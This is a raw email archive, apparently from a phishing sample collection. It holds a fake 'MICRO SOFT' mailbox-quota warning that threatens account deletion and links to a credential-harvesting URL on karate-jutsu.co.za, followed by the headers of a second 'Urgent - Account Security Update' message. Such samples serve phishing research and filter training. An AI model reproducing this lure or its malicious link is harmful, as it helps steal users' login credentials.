From: "MICRO SOFT" <noreply@live.com>
Date: Wed, 25 Nov 2015 15:38:12 +0200
Message-Id: <20151125132407.347341274DB@mx.airobotics.lv>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 265

You will not see this in a MIME-aware mail reader.
--===============1306591549==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear jose@monkey.org,
  =

   1969MB	  	  	 2000MB

  We noticed your e-mail account has almost exceed it's limit. And you may =
not be able to send or receive messages any moment from now, Click Here to =
renew your account.    NOTICE:  failure to renew your e-mail account. It wi=
ll be permanently disabled.   Thanks, Account Service
--===============1306591549==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><P style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-I=
NDENT: 0px; FONT: medium 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPA=
CING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-wid=
th: 0px"><SPAN style=3D"LINE-HEIGHT: 22px; FONT-SIZE: 12pt" id=3Dyiv2486292=
201yui_3_16_0_1_1409874957895_2912 class=3Dyiv2486292201><FONT color=3D#585=
858>Dear<SPAN class=3DApple-converted-space>&nbsp;</SPAN><STRONG><FONT colo=
r=3D#000000>jose@monkey.org</FONT></STRONG>,</FONT></SPAN></P>
<P>
<TABLE style=3D"BACKGROUND-IMAGE: none; WIDOWS: 1; TEXT-TRANSFORM: none; TE=
XT-INDENT: 0px; BACKGROUND-REPEAT: repeat; FONT-FAMILY: 'Times New Roman'; =
LETTER-SPACING: normal; COLOR: rgb(68,68,68); FONT-SIZE: 24px; WORD-SPACING=
: 0px; -webkit-text-stroke-width: 0px; font-stretch: normal" id=3Dyiv248629=
2201yui_3_16_0_1_1409874957895_2893 class=3Dyiv2486292201 border=3D0 cellSp=
acing=3D0 cellPadding=3D0>
<TBODY style=3D"LINE-HEIGHT: 21px; WIDTH: 293px" id=3Dyiv2486292201yui_3_16=
_0_1_1409874957895_2892 class=3Dyiv2486292201>
<TR id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2891 class=3Dyiv2486292201>
<TD style=3D"BORDER-BOTTOM: black 1pt solid; BORDER-LEFT: black 1pt solid; =
PADDING-BOTTOM: 0in; PADDING-LEFT: 0in; WIDTH: 131.25pt; PADDING-RIGHT: 0in=
; BACKGROUND: rgb(255,204,0); BORDER-RIGHT-COLOR: rgb(240,240,240); BORDER-=
TOP: black 1pt solid; PADDING-TOP: 0in" id=3Dyiv2486292201yui_3_16_0_1_1409=
874957895_2911 class=3Dyiv2486292201 width=3D175><SPAN style=3D"LINE-HEIGHT=
: 22px; FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(34,34,34); FONT-SIZE: 1=
2pt" id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2926 class=3Dyiv248629220=
1>1969MB</SPAN><SPAN style=3D"LINE-HEIGHT: 22px; COLOR: rgb(34,34,34); FONT=
-SIZE: 12pt" class=3Dyiv2486292201></SPAN></TD>
<TD style=3D"BORDER-BOTTOM: black 1pt solid; PADDING-BOTTOM: 0in; BACKGROUN=
D-COLOR: transparent; PADDING-LEFT: 0in; WIDTH: 18.75pt; PADDING-RIGHT: 0in=
; BORDER-LEFT-COLOR: rgb(240,240,240); BORDER-TOP: black 1pt solid; BORDER-=
RIGHT: black 1pt solid; PADDING-TOP: 0in" id=3Dyiv2486292201yui_3_16_0_1_14=
09874957895_2924 class=3Dyiv2486292201 width=3D25><SPAN style=3D"LINE-HEIGH=
T: 22px; COLOR: rgb(34,34,34); FONT-SIZE: 12pt" class=3Dyiv2486292201></SPA=
N>&nbsp;</TD>
<TD style=3D"BORDER-BOTTOM: rgb(240,240,240); BORDER-LEFT: rgb(240,240,240)=
; PADDING-BOTTOM: 0in; PADDING-LEFT: 0in; PADDING-RIGHT: 0in; BACKGROUND: 0=
px 50%; BORDER-TOP: rgb(240,240,240); BORDER-RIGHT: rgb(240,240,240); PADDI=
NG-TOP: 0in" id=3Dyui_3_16_0_1_1410448463373_1911 class=3Dyiv2486292201 vAl=
ign=3Dtop>&nbsp;</TD>
<TD style=3D"BORDER-BOTTOM: rgb(240,240,240); BORDER-LEFT: rgb(240,240,240)=
; PADDING-BOTTOM: 0in; PADDING-LEFT: 0in; PADDING-RIGHT: 0in; BACKGROUND: 0=
px 50%; BORDER-TOP: rgb(240,240,240); BORDER-RIGHT: rgb(240,240,240); PADDI=
NG-TOP: 0in" id=3Dyui_3_16_0_1_1410448463373_1885 class=3Dyiv2486292201><B =
id=3Dyui_3_16_0_1_1410448463373_1884 class=3Dyiv2486292201><SPAN style=3D"L=
INE-HEIGHT: 22px; FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(34,34,34); FO=
NT-SIZE: 12pt" id=3Dyui_3_16_0_1_1410448463373_1886 class=3Dyiv2486292201>2=
000</SPAN></B><SPAN style=3D"LINE-HEIGHT: 22px; FONT-FAMILY: Tahoma, sans-s=
erif; COLOR: rgb(34,34,34); FONT-SIZE: 12pt" id=3Dyui_3_16_0_1_141044846337=
3_1913 class=3Dyiv2486292201>MB</SPAN><SPAN style=3D"LINE-HEIGHT: 22px; COL=
OR: rgb(34,34,34); FONT-SIZE: 12pt" class=3Dyiv2486292201></SPAN></TD></TR>=
</TBODY></TABLE></P>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: medi=
um 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: r=
gb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px" class=3Dyiv24=
86292201></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2909 class=3Dyiv2486=
292201><SPAN style=3D"LINE-HEIGHT: 22px; FONT-SIZE: 12pt" id=3Dyiv248629220=
1yui_3_16_0_1_1409874957895_2907 class=3Dyiv2486292201><FONT color=3D#4d4d4=
d>We noticed your e-mail account has almost exceed it's limit.<SPAN class=
=3DApple-converted-space>&nbsp;</SPAN></FONT></SPAN><FONT color=3D#4d4d4d s=
ize=3D3><SPAN>And you may not be able to send or receive messages any momen=
t from now,</SPAN></FONT></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2906 class=3Dyiv2486=
292201><SPAN><A style=3D"BACKGROUND-IMAGE: none; OUTLINE-COLOR: invert; OUT=
LINE-WIDTH: medium; BACKGROUND-ATTACHMENT: scroll; BACKGROUND-REPEAT: repea=
t; BACKGROUND-POSITION: 0% 0%; COLOR: rgb(34,34,34)" id=3Dyiv2486292201yui_=
3_16_0_1_1409874957895_2903 class=3Dyiv2486292201 title=3D"" href=3D"http:/=
/karate-jutsu.co.za/css/1/verification/?email=3Djose@monkey.org" target=3D_=
blank><SPAN style=3D"COLOR: rgb(0,104,207)" id=3Dyiv2486292201yui_3_16_0_1_=
1409874957895_2902 class=3Dyiv2486292201><FONT color=3D#4d4d4d size=3D3>Cli=
ck Here to&nbsp;renew your account.</FONT></SPAN></A><FONT color=3D#4d4d4d =
size=3D3>&nbsp;</FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" class=3Dyiv2486292201><SPAN><FONT color=3D#4d4d4d size=3D3></FONT=
></SPAN>&nbsp;</DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" class=3Dyiv2486292201><SPAN><FONT color=3D#4d4d4d size=3D3><STRON=
G><U>NOTICE:</U>&nbsp;</STRONG></FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" class=3Dyiv2486292201><SPAN><FONT color=3D#4d4d4d size=3D3>failur=
e to renew your e-mail account. It&nbsp;will be permanently disabled.</FONT=
></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" class=3Dyiv2486292201><SPAN><FONT color=3D#4d4d4d size=3D3></FONT=
></SPAN>&nbsp;</DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2898 class=3Dyiv2486=
292201><SPAN style=3D"LINE-HEIGHT: 22px; FONT-SIZE: 12pt" class=3Dyiv248629=
2201><FONT color=3D#4d4d4d>Thanks,</FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: 24px=
 'Times New Roman'; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb=
(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px; font-stretch=
: normal" id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2900 class=3Dyiv2486=
292201><SPAN style=3D"LINE-HEIGHT: 22px; FONT-SIZE: 12pt" id=3Dyiv248629220=
1yui_3_16_0_1_1409874957895_2901 class=3Dyiv2486292201><FONT color=3D#4d4d4=
d>Account Service</FONT></SPAN></DIV></BODY></HTML>
--===============1306591549==--

From jose@monkey.org Wed Nov 25 23:36:03 2015 +0000
Return-Path: joohhfhhrh@ubagroup.com
Delivered-To: jose@monkey.org
X-FDA: 70894733406.12.brain36_51e89337e8517
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,0,0,3c8270ee423efd84,d41d8cd98f00b204,joohhfhhrh@ubagroup.com,:joohhfhhrh@ubagroup.com,RULES_HIT:1:2:41:72:152:355:379:455:800:962:967:969:973:983:988:989:1189:1208:1221:1260:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1685:1730:1744:1777:1792:1803:2194:2196:2198:2199:2200:2201:2525:2527:2560:2568:2610:2682:2685:2693:2737:2859:2890:2891:2892:2894:2895:2897:2899:2903:2907:2914:2918:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3154:3352:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4031:4042:4052:4250:4321:4362:4700:5007:6238:6248:6261:6678:6687:6688:7208:7809:8516:8518:8568:8599:8603:8957:9025:9060:9080:9121:9130:9149:9177:9388:9908:10030:10049:10346:10946:11026:11233:11657:11658:11914:12043:12050:12051:12295:12438:12555:12561:12729:12737:12776:12812:12889:12963:13025:13038:13132:13139:13227:13229:13231:
X-HE-Tag: brain36_51e89337e8517
X-Filterd-Recvd-Size: 12617
Received: from smtp02.atlngahp.sys.nuvox.net (smtp-out2.atlngahp.sys.nuvox.net [70.43.63.19])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 25 Nov 2015 23:36:02 +0000 (UTC)
Received: from TSTSVR.TSTLogistics.local (nsc64.16.141-114.newsouth.net [64.16.141.114])
	by smtp02.atlngahp.sys.nuvox.net (8.13.1/8.13.1) with ESMTP id tAPKYk2w026848;
	Wed, 25 Nov 2015 18:25:15 -0500
Message-Id: <201511252325.tAPKYk2w026848@smtp02.atlngahp.sys.nuvox.net>
Content-Type: multipart/alternative; boundary="===============2050357409=="
MIME-Version: 1.0
Subject: Urgent - Account Security Update
To: Recipients <joohhfhhrh@ubagroup.com>
